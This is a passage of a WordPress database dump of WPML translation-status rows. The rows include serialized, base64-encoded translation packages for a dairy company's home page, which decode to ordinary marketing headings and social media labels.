(49, 149, 9, 0, 0, '', '', 0, '', '2022-10-22 06:16:18', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(50, 150, 9, 0, 0, '', '', 0, '', '2022-10-22 06:16:18', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(51, 152, 9, 0, 0, '', '', 0, '', '2022-10-22 06:18:56', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(52, 153, 9, 0, 0, '', '', 0, '', '2022-10-22 06:18:56', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(53, 155, 9, 0, 0, '', '', 0, '', '2022-10-22 06:19:06', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(54, 156, 9, 0, 0, '', '', 0, '', '2022-10-22 06:19:06', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(55, 158, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:03', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(56, 159, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:03', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(57, 161, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:14', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(58, 162, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:14', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(59, 164, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:25', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(60, 165, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:25', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(61, 167, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:35', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(62, 168, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:35', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(63, 170, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:46', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(64, 171, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:46', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(65, 173, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:57', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(66, 174, 9, 0, 0, '', '', 0, '', '2022-10-22 07:13:57', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(67, 176, 9, 0, 0, '', '', 0, '', '2022-10-22 07:14:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(68, 177, 9, 0, 0, '', '', 0, '', '2022-10-22 07:14:07', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(69, 179, 9, 0, 0, '', '', 0, '', '2022-10-22 07:21:44', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(70, 180, 9, 0, 0, '', '', 0, '', '2022-10-22 07:21:44', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(71, 194, 10, 1, 0, 'a70a392a63867ed1e9574e57869eb673', 'local', 1, 'a:4:{s:3:\"url\";s:36:\"http://arisgolpayegan.com?page_id=14\";s:5:\"title\";s:4:\"Home\";s:8:\"contents\";a:27:{s:11:\"original_id\";a:2:{s:9:\"translate\";i:0;s:4:\"data\";i:14;}s:5:\"title\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:8:\"SG9tZQ==\";s:6:\"format\";s:6:\"base64\";}s:4:\"body\";a:3:{s:9:\"translate\";i:0;s:4:\"data\";s:21872:\"[encoded data, 21872 characters]\";s:6:\"format\";s:6:\"base64\";}s:7:\"excerpt\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:4:\"t_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"T3B0aW9uYWw=\";s:6:\"format\";s:6:\"base64\";}s:8:\"tdesc_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-61\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:72:\"W3Jldl9zbGlkZXIgc2xpZGVydGl0bGU9IlNsaWRlciAxIiBhbGlhcz0ic2xpZGVyLTEiXQ==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3957\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:664:\"DQo8aDEgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxzcGFuIHN0eWxlPSJjb2xvcjogIzAyM2Y4ODsiPklyYW4gRGFpcnkgSW5kdXN0cmllcyBDb21tZXJjaWFsIENvLiBQcm9kdWN0czwvc3Bhbj48L2gxPg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPlRoZSB1bmlxdWUgcXVhbGl0eSBvZiBQZWdhaCBhbmQgSG9sZGluZyBwcm9kdWN0cyBhbmQgdGhlIHBvdGVudGlhbCBvZiBhbGwgcHJvZHVjdGlvbiBjb21wYW5pZXMsIG9idGFpbmluZyB2YXJpb3VzIG5hdGlvbmFsIGFuZCBpbnRlcm5hdGlvbmFsIHN0YW5kYXJkcywgdXNpbmcgZXhwZXJpZW5jZWQgYW5kIHNwZWNpYWxpemVkIHBlcnNvbm5lbCBhbmQgYXBwbHlpbmcgdGFyZ2V0ZWQgYW5kIGZsZXhpYmxlIHBvbGljaWVzIGFuZCBzdHJhdGVnaWVzIHRvIHRoZSBtYXJrZXQgY29uZGl0aW9ucyBvZiB0aGlzIGNvbXBhbnkuIEhhcyBoZWxwZWQgYWNoaWV2ZSBpdHMgbG9uZy10ZXJtIGdvYWxzLjwvcD4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3958\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:128:\"DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxzcGFuIHN0eWxlPSJjb2xvcjogIzAyM2Y4ODsiPkFyaXMgU29jaWFsIE1lZGlhPC9zcGFuPjwvaDI+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-64\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"SW5zdGFncmFt\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-65\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:8:\"QXBhcmF0\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-66\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"TGlua2VkaW4=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-68\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:28:\"Rm9sbG93IG9uIEluc3RhZ3JhbQ==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-67\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"aW5zdGFob3p6\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3944\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:168:\"DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsgY29sb3I6ICNmZmY7IGZvbnQtc2l6ZTogMjhweDsgbGluZS1oZWlnaHQ6IDEuNTsgbWFyZ2luLWJvdHRvbTogNTVweDsiPldoeSBjaG9vc2UgdXM/PC9oMj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3945\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:144:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+MTAwJSBOYXR1cmFsDQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3946\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:156:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+U29jaWFsIFJlc3BvbnNpYmlsaXR5DQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3947\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:148:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+V29ybGR3aWRlIEV4cG9ydA0KPC9zcGFuPjwvZGl2Pg0K\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3948\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:148:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+VGFzdGUtb3JpZW50ZWQNCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3949\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:156:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+U3RhbmRhcmQgYW5kIEhlYWx0aHkNCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3950\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:160:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+SGVhbHRoLW9yaWVudGVkIHByb2R1Y3RzDQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3951\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:144:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+RWNvLWZyaWVuZGx5DQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3952\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:168:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+TGFzdGluZyBxdWFsaXR5LCBtdXR1YWwgdHJ1c3QNCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3953\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:168:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+QnJhbmQgb3JpZ2luYWxpdHkgYW5kIG5vc3RhbGdpYQ0KPC9zcGFuPjwvZGl2Pg0K\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3954\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:144:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+TW9kZXJuIEZhcm0NCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3959\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:528:\"DQo8aDI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjMDIzZjg4OyI+QXJpcyBjb21tZXJjaWFsIGludHJvZHVjdGlvbjwvc3Bhbj48L2gyPg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGp1c3RpZnk7Ij5JcmFuIERhaXJ5IEluZHVzdHJpZXMgY29tbWVyY2lhbCBDb21wYW55IGlzIG9uZSBvZiB0aGUgc3Vic2lkaWFyaWVzIG9mIElyYW4gRGFpcnkgSW5kdXN0cmllcyBhbmQgdGhlIGZvb2QsIGFncmljdWx0dXJlIGFuZCBwaGFybWFjZXV0aWNhbCBob2xkaW5nIGNvbXBhbnkgb2YgdGhlIE5hdGlvbmFsIFBlbnNpb24gRnVuZCwgd2hpY2ggaXMgaW4gbGluZSB3aXRoIHRoZSBnb2FscyBhbmQgbmV3IHBvbGljaWVzIG9mIGVjb25vbWljIGRldmVsb3BtZW50IG9mIHRoZSBjb21wbGV4IGFuZCBldGMuPC9wPg0K\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3956\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:16:\"Z2FsbGJvdGhveg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}}s:4:\"type\";s:4:\"post\";}', '2022-10-23 05:26:13', 0, NULL, NULL, NULL, 1, NULL, NULL, 0);
INSERT INTO `wp_icl_translation_status` (`rid`, `translation_id`, `status`, `translator_id`, `needs_update`, `md5`, `translation_service`, `batch_id`, `translation_package`, `timestamp`, `links_fixed`, `_prevstate`, `uuid`, `tp_id`, `tp_revision`, `ts_status`, `review_status`, `ate_comm_retry_count`) VALUES
(72, 200, 10, 1, 0, 'a70a392a63867ed1e9574e57869eb673', 'local', 1, 'a:4:{s:3:\"url\";s:36:\"http://arisgolpayegan.com?page_id=14\";s:5:\"title\";s:4:\"Home\";s:8:\"contents\";a:27:{s:11:\"original_id\";a:2:{s:9:\"translate\";i:0;s:4:\"data\";i:14;}s:5:\"title\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:8:\"SG9tZQ==\";s:6:\"format\";s:6:\"base64\";}s:4:\"body\";a:3:{s:9:\"translate\";i:0;s:4:\"data\";s:21872:\"[encoded data, 21872 characters]\";s:6:\"format\";s:6:\"base64\";}s:7:\"excerpt\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:4:\"t_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"T3B0aW9uYWw=\";s:6:\"format\";s:6:\"base64\";}s:8:\"tdesc_19\";a:3:{s:9:\"translate\";i:1;s:4:\"data\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-61\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:72:\"W3Jldl9zbGlkZXIgc2xpZGVydGl0bGU9IlNsaWRlciAxIiBhbGlhcz0ic2xpZGVyLTEiXQ==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3957\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:664:\"DQo8aDEgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxzcGFuIHN0eWxlPSJjb2xvcjogIzAyM2Y4ODsiPklyYW4gRGFpcnkgSW5kdXN0cmllcyBDb21tZXJjaWFsIENvLiBQcm9kdWN0czwvc3Bhbj48L2gxPg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPlRoZSB1bmlxdWUgcXVhbGl0eSBvZiBQZWdhaCBhbmQgSG9sZGluZyBwcm9kdWN0cyBhbmQgdGhlIHBvdGVudGlhbCBvZiBhbGwgcHJvZHVjdGlvbiBjb21wYW5pZXMsIG9idGFpbmluZyB2YXJpb3VzIG5hdGlvbmFsIGFuZCBpbnRlcm5hdGlvbmFsIHN0YW5kYXJkcywgdXNpbmcgZXhwZXJpZW5jZWQgYW5kIHNwZWNpYWxpemVkIHBlcnNvbm5lbCBhbmQgYXBwbHlpbmcgdGFyZ2V0ZWQgYW5kIGZsZXhpYmxlIHBvbGljaWVzIGFuZCBzdHJhdGVnaWVzIHRvIHRoZSBtYXJrZXQgY29uZGl0aW9ucyBvZiB0aGlzIGNvbXBhbnkuIEhhcyBoZWxwZWQgYWNoaWV2ZSBpdHMgbG9uZy10ZXJtIGdvYWxzLjwvcD4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3958\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:128:\"DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxzcGFuIHN0eWxlPSJjb2xvcjogIzAyM2Y4ODsiPkFyaXMgU29jaWFsIE1lZGlhPC9zcGFuPjwvaDI+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-64\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"SW5zdGFncmFt\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-65\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:8:\"QXBhcmF0\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-66\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"TGlua2VkaW4=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-68\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:28:\"Rm9sbG93IG9uIEluc3RhZ3JhbQ==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:19:\"package-string-2-67\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:12:\"aW5zdGFob3p6\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3944\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:168:\"DQo8aDIgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsgY29sb3I6ICNmZmY7IGZvbnQtc2l6ZTogMjhweDsgbGluZS1oZWlnaHQ6IDEuNTsgbWFyZ2luLWJvdHRvbTogNTVweDsiPldoeSBjaG9vc2UgdXM/PC9oMj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3945\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:144:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+MTAwJSBOYXR1cmFsDQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3946\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:156:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+U29jaWFsIFJlc3BvbnNpYmlsaXR5DQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3947\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:148:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+V29ybGR3aWRlIEV4cG9ydA0KPC9zcGFuPjwvZGl2Pg0K\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3948\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:148:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+VGFzdGUtb3JpZW50ZWQNCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3949\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:156:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+U3RhbmRhcmQgYW5kIEhlYWx0aHkNCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3950\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:160:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+SGVhbHRoLW9yaWVudGVkIHByb2R1Y3RzDQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3951\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:144:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+RWNvLWZyaWVuZGx5DQo8L3NwYW4+PC9kaXY+DQo=\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3952\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:168:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+TGFzdGluZyBxdWFsaXR5LCBtdXR1YWwgdHJ1c3QNCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3953\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:168:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+QnJhbmQgb3JpZ2luYWxpdHkgYW5kIG5vc3RhbGdpYQ0KPC9zcGFuPjwvZGl2Pg0K\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3954\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:144:\"DQo8ZGl2IGNsYXNzPSJkZXNjIiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjZmZmZmZmOyI+TW9kZXJuIEZhcm0NCjwvc3Bhbj48L2Rpdj4NCg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3959\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:528:\"DQo8aDI+PHNwYW4gc3R5bGU9ImNvbG9yOiAjMDIzZjg4OyI+QXJpcyBjb21tZXJjaWFsIGludHJvZHVjdGlvbjwvc3Bhbj48L2gyPg0KPHAgc3R5bGU9InRleHQtYWxpZ246IGp1c3RpZnk7Ij5JcmFuIERhaXJ5IEluZHVzdHJpZXMgY29tbWVyY2lhbCBDb21wYW55IGlzIG9uZSBvZiB0aGUgc3Vic2lkaWFyaWVzIG9mIElyYW4gRGFpcnkgSW5kdXN0cmllcyBhbmQgdGhlIGZvb2QsIGFncmljdWx0dXJlIGFuZCBwaGFybWFjZXV0aWNhbCBob2xkaW5nIGNvbXBhbnkgb2YgdGhlIE5hdGlvbmFsIFBlbnNpb24gRnVuZCwgd2hpY2ggaXMgaW4gbGluZSB3aXRoIHRoZSBnb2FscyBhbmQgbmV3IHBvbGljaWVzIG9mIGVjb25vbWljIGRldmVsb3BtZW50IG9mIHRoZSBjb21wbGV4IGFuZCBldGMuPC9wPg0K\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}s:21:\"package-string-2-3956\";a:4:{s:9:\"translate\";i:1;s:4:\"data\";s:16:\"Z2FsbGJvdGhveg==\";s:8:\"wrap_tag\";s:0:\"\";s:6:\"format\";s:6:\"base64\";}}s:4:\"type\";s:4:\"post\";}', '2022-10-23 08:37:51', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(73, 215, 9, 0, 0, '', '', 0, '', '2022-10-26 08:29:25', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(74, 216, 9, 0, 0, '', '', 0, '', '2022-10-26 08:29:25', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(75, 218, 9, 0, 0, '', '', 0, '', '2022-10-26 08:29:28', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(76, 219, 9, 0, 0, '', '', 0, '', '2022-10-26 08:29:28', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(77, 221, 9, 0, 0, '', '', 0, '', '2022-10-26 08:29:33', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(78, 222, 9, 0, 0, '', '', 0, '', '2022-10-26 08:29:33', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(79, 224, 9, 0, 0, '', '', 0, '', '2022-10-26 08:32:55', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(80, 225, 9, 0, 0, '', '', 0, '', '2022-10-26 08:32:56', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(81, 227, 9, 0, 0, '', '', 0, '', '2022-10-26 08:32:59', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(82, 228, 9, 0, 0, '', '', 0, '', '2022-10-26 08:32:59', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(83, 230, 9, 0, 0, '', '', 0, '', '2022-10-26 08:33:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(84, 231, 9, 0, 0, '', '', 0, '', '2022-10-26 08:33:02', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(85, 233, 9, 0, 0, '', '', 0, '', '2022-10-26 08:33:05', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(86, 234, 9, 0, 0, '', '', 0, '', '2022-10-26 08:33:05', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(87, 236, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:12', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(88, 237, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:12', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(89, 239, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:16', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(90, 240, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:16', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(91, 242, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:19', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(92, 243, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:19', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(93, 245, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:21', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(94, 246, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:21', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(95, 248, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:24', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(96, 249, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:24', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(97, 251, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:27', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(98, 252, 9, 0, 0, '', '', 0, '', '2022-10-26 08:49:27', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(109, 269, 9, 0, 0, '', '', 0, '', '2022-10-26 08:56:15', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(110, 270, 9, 0, 0, '', '', 0, '', '2022-10-26 08:56:15', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
(111, 272, 9, 0, 0, '', '', 0, '', '2022-10-26 08:56:20', 0, NULL, NULL, NULL, 1, NULL, NULL, 0),
